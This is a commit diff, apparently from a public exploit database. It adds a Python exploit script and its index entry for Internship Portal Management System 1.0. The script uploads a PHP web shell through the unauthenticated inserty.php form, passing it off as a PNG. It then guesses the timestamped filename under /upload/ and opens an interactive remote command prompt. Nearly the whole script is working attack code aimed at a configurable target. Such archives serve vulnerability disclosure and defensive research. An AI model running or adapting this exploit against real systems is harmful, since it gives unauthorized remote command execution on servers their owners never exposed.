DB: 2021-05-05

1 changes to exploits/shellcodes Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
2021-05-05 05:01:52 +00:00 · 2021-05-05 05:01:52 +00:00 · b8cf9ea0fc
commit b8cf9ea0fc
parent dcd1229758
2 changed files with 75 additions and 0 deletions
--- a/exploits/php/webapps/49823.py
+++ b/exploits/php/webapps/49823.py
@ -0,0 +1,74 @@
+# Exploit Title: Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)
+# Date: 2021-05-04
+# Exploit Author: argenestel
+# Vendor Homepage: https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=11712&title=Internship+Portal+Management+System+using+PHP+with+Source+Code
+# Version: 1.0
+# Tested on: Debian 10
+
+import requests
+import time
+
+#change the url to the site running the vulnerable system
+url="http://127.0.0.1:4000"
+#burp proxy
+proxies = {
+ "http": "http://127.0.0.1:8080",
+}
+#payload
+payload='<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
+
+#the upload point
+insert_url=url+"/inserty.php"
+
+def fill_details():
+    global payload
+    global shellend
+    global shellstart
+    print("Online Intern System 1.0 Exploit: Unauth RCE via File Upload")
+    #time start
+    shellstart=int(time.time())
+    #print(shellstart)
+    files  = {'file':('shell.php',payload,
+                    'image/png', {'Content-Disposition': 'form-data'}
+                  )
+              }
+    data = {
+            "company_name":"some",
+            "first_name":"some",
+            "last_name":"some",
+            "email":"some@some.com",
+            "gender":"Male",
+            "insert_button":"Apply",
+            "terms":"on"
+    }
+    r = requests.post(insert_url, data=data, files=files)
+    if r.status_code == 200:
+        print("Exploited Intern System Successfully...")
+        shellend = int(time.time())
+        #print(shellend)
+        shell()
+    else:
+        print("Exploit Failed")
+
+def shell():
+    for shellname in range(shellstart, shellend+1):
+        shellstr=str(shellname)
+        shell_url=url+"/upload/"+shellstr+"_shell.php"
+        r = requests.get(shell_url)
+        if r.status_code == 200:
+            shell_url=url+"/upload/"+shellstr+"_shell.php"
+            break
+    
+    r = requests.get(shell_url)
+    if r.status_code == 200:
+        print("Shell Starting...")
+        while True:
+            cmd=input("cmd$ ")
+            r = requests.get(shell_url+"?cmd="+cmd)
+            print(r.text)
+    else:
+        print("File Name Error")
+
+
+fill_details()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -43990,3 +43990,4 @@ id,file,description,date,author,type,platform,port
 49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,
 49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
 49822,exploits/ruby/webapps/49822.rb,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
+49823,exploits/php/webapps/49823.py,"Internship Portal Management System 1.0 - Remote Code Execution Via File Upload (Unauthenticated)",2021-05-04,argenestel,webapps,php,